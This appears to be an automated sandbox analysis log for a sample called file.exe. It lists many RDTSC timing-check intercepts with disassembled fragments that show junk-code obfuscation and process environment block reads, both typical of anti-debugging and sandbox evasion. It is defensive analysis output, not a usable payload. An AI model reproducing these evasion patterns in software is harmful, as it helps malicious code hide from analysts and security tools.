Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA97F3 second address: AA97F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA97F7 second address: AA97FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA97FF second address: AA9808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9C2A second address: AA9C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9C2E second address: AA9C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9C39 second address: AA9C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D8D second address: AA9D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D93 second address: AA9DC4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC134D1C052h 0x00000008 jmp 00007FC134D1C04Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC134D1C04Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9DC4 second address: AA9DCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9F30 second address: AA9F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9F34 second address: AA9F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC1350240C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC1350240D9h 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jmp 00007FC1350240CDh 0x0000001c popad 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD32B second address: AAD32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD3A8 second address: AAD3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD3AC second address: AAD3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD3B0 second address: AAD3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD3B6 second address: AAD3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD3BB second address: AAD415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FC1350240CEh 0x00000010 push esi 0x00000011 je 00007FC1350240C6h 0x00000017 pop esi 0x00000018 nop 0x00000019 mov dl, B1h 0x0000001b push 00000004h 0x0000001d mov edx, dword ptr [ebp+122D2B88h] 0x00000023 call 00007FC1350240C9h 0x00000028 jmp 00007FC1350240D0h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007FC1350240D9h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD415 second address: AAD42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FC134D1C04Ch 0x00000012 ja 00007FC134D1C046h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD42D second address: AAD432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAD432 second address: AAD46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007FC134D1C060h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007FC134D1C048h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9B6 second address: AAE9BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB0817 second address: AB0833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e push eax 0x0000000f jmp 00007FC134D1C04Ah 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0993 second address: 4DA0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, 2Fh 0x00000007 popad 0x00000008 pop ecx 0x00000009 jmp 00007FC1350240D0h 0x0000000e ret 0x0000000f nop 0x00000010 xor esi, eax 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 call 00007FC1399C1A1Ah 0x0000001b mov edi, edi 0x0000001d jmp 00007FC1350240D5h 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 mov dx, cx 0x00000027 pushfd 0x00000028 jmp 00007FC1350240D8h 0x0000002d jmp 00007FC1350240D5h 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 push edi 0x00000037 jmp 00007FC1350240CAh 0x0000003c pop ecx 0x0000003d mov cx, bx 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0898 second address: 4DA089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA089F second address: 4DA08C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movsx edi, cx 0x00000011 mov ecx, 49E74A5Dh 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC1350240CFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA08C8 second address: 4DA08E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C054h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80021 second address: 4D80051 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d push edi 0x0000000e mov bh, ch 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC1350240D9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80051 second address: 4D80066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80066 second address: 4D80076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80076 second address: 4D800A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC134D1C056h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D800A6 second address: 4D800AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D800AC second address: 4D800EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007FC134D1C04Eh 0x0000000b xor esi, 7B575068h 0x00000011 jmp 00007FC134D1C04Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr fs:[00000030h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC134D1C050h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D800EF second address: 4D800F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D800F3 second address: 4D800F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D800F9 second address: 4D80135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FC1350240D0h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov cx, 317Dh 0x00000017 mov ah, 68h 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, 0DA5F204h 0x00000023 mov bx, 2A70h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80135 second address: 4D801C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov ecx, ebx 0x00000010 popad 0x00000011 mov ebx, dword ptr [eax+10h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC134D1C04Bh 0x0000001b jmp 00007FC134D1C053h 0x00000020 popfd 0x00000021 call 00007FC134D1C058h 0x00000026 mov ah, FEh 0x00000028 pop edx 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b jmp 00007FC134D1C04Ah 0x00000030 push eax 0x00000031 jmp 00007FC134D1C04Bh 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC134D1C050h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801C3 second address: 4D801C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801C9 second address: 4D801CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801CF second address: 4D801D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D801D3 second address: 4D80233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [762C06ECh] 0x0000000e jmp 00007FC134D1C054h 0x00000013 test esi, esi 0x00000015 jmp 00007FC134D1C050h 0x0000001a jne 00007FC134D1CE59h 0x00000020 pushad 0x00000021 jmp 00007FC134D1C04Eh 0x00000026 popad 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC134D1C053h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80233 second address: 4D802A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC1350240CCh 0x00000013 jmp 00007FC1350240D5h 0x00000018 popfd 0x00000019 push eax 0x0000001a mov di, 7482h 0x0000001e pop ebx 0x0000001f popad 0x00000020 call dword ptr [76290B60h] 0x00000026 mov eax, 75A0E5E0h 0x0000002b ret 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movsx ebx, ax 0x00000032 pushfd 0x00000033 jmp 00007FC1350240CCh 0x00000038 or cx, 0018h 0x0000003d jmp 00007FC1350240CBh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802A9 second address: 4D802CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D802CD second address: 4D80304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC1350240D9h 0x0000000a sub esi, 1CA28316h 0x00000010 jmp 00007FC1350240D1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80304 second address: 4D80372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC134D1C057h 0x00000008 pop ecx 0x00000009 call 00007FC134D1C059h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop edi 0x00000013 jmp 00007FC134D1C057h 0x00000018 xchg eax, edi 0x00000019 jmp 00007FC134D1C056h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov eax, edi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80372 second address: 4D80381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80381 second address: 4D80385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80385 second address: 4D803FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007FC1350240D5h 0x0000000e push dword ptr [eax] 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 push edx 0x00000015 movzx esi, di 0x00000018 pop edx 0x00000019 popad 0x0000001a mov eax, dword ptr fs:[00000030h] 0x00000020 pushad 0x00000021 mov di, cx 0x00000024 pushfd 0x00000025 jmp 00007FC1350240D6h 0x0000002a or al, 00000048h 0x0000002d jmp 00007FC1350240CBh 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [eax+18h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC1350240D5h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80450 second address: 4D80456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80456 second address: 4D8045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8045A second address: 4D80470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC1A61DB28Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80470 second address: 4D80476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80476 second address: 4D8047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8047A second address: 4D80498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC1350240CFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80498 second address: 4D804D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov ax, D1B3h 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 mov dword ptr [esi+04h], eax 0x00000017 pushad 0x00000018 mov al, dh 0x0000001a mov ah, 3Ch 0x0000001c popad 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804D1 second address: 4D804D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804D5 second address: 4D804F5 instructions: 0x00000000 rdtsc 0x00000002 mov bl, 6Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 87h 0x00000008 popad 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007FC134D1C04Bh 0x00000011 mov eax, dword ptr [ebx+4Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804F5 second address: 4D804FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D804FB second address: 4D80501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80501 second address: 4D80505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80505 second address: 4D80509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80509 second address: 4D8053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c mov cx, 591Dh 0x00000010 mov cx, 6A19h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebx+50h] 0x00000018 jmp 00007FC1350240D4h 0x0000001d mov dword ptr [esi+14h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8053E second address: 4D8055B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8055B second address: 4D80593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FC1350240CDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+54h] 0x00000011 jmp 00007FC1350240D7h 0x00000016 mov dword ptr [esi+18h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80593 second address: 4D8059C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 6D44h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8059C second address: 4D805B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D805B9 second address: 4D805C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, 3Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D805C9 second address: 4D80649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC1350240D0h 0x00000010 sub ax, 2388h 0x00000015 jmp 00007FC1350240CBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FC1350240D8h 0x00000021 adc esi, 1B2205E8h 0x00000027 jmp 00007FC1350240CBh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f mov dword ptr [esi+1Ch], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FC1350240D5h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80649 second address: 4D80661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC134D1C04Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80661 second address: 4D80667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80667 second address: 4D8066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8066B second address: 4D8066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8066F second address: 4D8067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8067F second address: 4D80687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80687 second address: 4D8068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8068D second address: 4D80691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80691 second address: 4D806BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 jmp 00007FC134D1C057h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806BA second address: 4D806C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806C0 second address: 4D806EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC134D1C055h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806EB second address: 4D806F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
